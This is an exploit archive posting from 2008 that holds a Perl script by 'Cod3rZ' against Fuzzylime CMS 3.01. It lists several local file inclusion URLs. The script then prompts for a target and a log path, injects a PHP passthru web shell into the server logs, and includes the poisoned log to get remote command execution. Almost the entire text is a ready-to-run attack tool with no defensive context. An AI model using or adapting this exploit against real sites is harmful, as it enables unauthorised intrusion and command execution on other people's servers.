Home / exploitsPDF  

fuzzylime-lfi.txt

Posted on 10 July 2008

#!/usr/bin/perl # ---------------------------------------------------------- # Fuzzylime CMS 3.01 Multiple LFI / RCE # author : Cod3rZ # website : http://cod3rz.helloweb.eu # ---------------------------------------------------------- # http://[site]/blog.php?file=../[file] # http://[site]/code/newsheads.php?heads=../[file] # post # http://[site]/code/commupdate.php (type=count&s=[file]) # ---------------------------------------------------------- # LFI to RCE: # ---------------------------------------------------------- use LWP::UserAgent; system("cls"); #system("clear"); print " ------------------------------------------------- "; print " Fuzzylime CMS 3.01 LFI / RCE "; print " Powered by Cod3rZ "; print " http://cod3rz.helloweb.eu "; print " ------------------------------------------------- "; print " Insert Site (http://site.com/): "; chomp($site = <STDIN>); print " ------------------------------------------------- "; print " Insert Logs path "; chomp($path = <STDIN>); print " ------------------------------------------------- "; #Infect Logs $lwp = LWP::UserAgent->new; $siten = $site.'/blog.php?file='; $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz'); #Control $ua = $lwp->get($site.$path.'%00'); if($ua->content =~ m/cod3rz/) { print " Ok ".$site." is infected "; print " ------------------------------------------------- "; print " ".$siten.$path."&cmd=[command]\0 "; print " ------------------------------------------------- "; }

 

TOP